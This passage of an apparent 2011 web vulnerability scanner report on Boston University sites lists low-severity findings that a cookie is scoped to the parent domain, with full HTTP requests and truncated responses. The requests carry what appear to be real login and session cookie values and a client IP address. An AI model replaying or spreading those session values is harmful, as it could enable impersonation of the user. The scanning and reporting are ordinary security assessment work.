Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://people.bu.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; isMobile=false_1.2

Response

HTTP/1.1 401 Authorization Required
Date: Wed, 05 Oct 2011 18:01:53 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
WWW-Authenticate: Basic realm="BU login and Kerberos passwd 05Oct 14:0225"
X-BU-Tag: auth
X-UniqueID: ToybkQrxHDsAAGa7HzE
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToybkQrxHDsAAGazeO0AAAA@
X-BU-Duration: D=40193402
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 397

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>
<H1>Authorization Required</H1>
This server could not verify that you
are author
...[SNIP]...

6.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:04:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycRgrxHDsAAFvabks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:04:54 GMT
X-BU-Main-Uniqueid: ToycRgrxHDsAAGaoW@YAAAAi
X-BU-Duration: D=24104411
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

6.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyccwrxHDsAAGWJAWs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:05:39 GMT
X-BU-Main-Uniqueid: ToyccwrxHDsAAGarZZ4AAAAq
X-BU-Duration: D=24106310
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

6.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.21.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:23 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycnwrxHDsAAAJizks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:06:23 GMT
X-BU-Main-Uniqueid: ToycnwrxHDsAAGaXUrcAAAAm
X-BU-Duration: D=73727061
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

6.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler-head.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler-head.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 19:06:24 GMT
ETag: "4211040100b7-26f-3d8845fc28c00"
Accept-Ranges: bytes
Content-Length: 623
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhgGggAAAAo
X-BU-Duration: D=9614
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a...................!.......,.............................H....*.....1...-....7...........Ia..\:....Z.^.....g.c...E...6..v......W.........xG.'.X8..x..h...H.h)    9y..Y........:*j.........z:.*[..K..
...[SNIP]...

6.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 20:06:24 GMT
ETag: "4212040100b7-a6-3d88536563000"
Accept-Ranges: bytes
Content-Length: 166
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhPgAIAAAAd
X-BU-Duration: D=9603
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a.............!.......,..........}..................H...........L..........
.....L*....    .J......j............N....................(8HXhx..........)9IYiy....T..;

6.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/footer.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/footer.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:22:51 GMT
ETag: "63b1040100b7-3af-476611ca010c0"
Accept-Ranges: bytes
Content-Length: 943
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhuN6IAAAAz
X-BU-Duration: D=9357
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..=................!.......,......=......................H.....j    ....L..........    .....L*..R.    .J......=.........-..N...6........
.........8HXhx.&.........9IYiyI!.....9..):JZ..j....:..
.+;K.J{....
...[SNIP]...

6.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/main-title.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/main-title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:08 GMT
ETag: "63b3040100b7-b44-476611da37700"
Accept-Ranges: bytes
Content-Length: 2884
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFiBZTEAAABF
X-BU-Duration: D=10317
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

6.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/sub_title.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/sub_title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:18 GMT
ETag: "63b4040100b7-a34-476611e3c0d80"
Accept-Ranges: bytes
Content-Length: 2612
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhdEfAAAAAl
X-BU-Duration: D=9262
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

6.22. https://weblogin.bu.edu/webnew/alumnew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...

6.23. https://www.bu.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:15 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Accept-Ranges: bytes
X-BU-Main-Uniqueid: ToyiNwrxHDYAAGKAtakAAABD
X-BU-Duration: D=7079
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...

6.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/annualfund/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/annualfund/index.html HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 23 Feb 2011 16:23:26 GMT
ETag: "1bd4002400001234-e39a-49cf584379bbe"
Accept-Ranges: bytes
Content-Length: 58266
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGUNv00AAAMX
X-BU-Duration: D=13739
X-BU-Backend: content_default (null)
Content-Type: text/html
Via: 1.1 www.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

6.25. https://www.bu.edu/alumni-forms/forms/ath/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/ath/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/ath/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Mar 2011 20:35:24 GMT
ETag: "1bd4014400001234-1423b-49fb91dc41b58"
Accept-Ranges: bytes
Content-Length: 82491
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGVNx3UAAAOV
X-BU-Duration: D=19114
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equi
...[SNIP]...

6.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/giving/online/index/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/giving/online/index/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
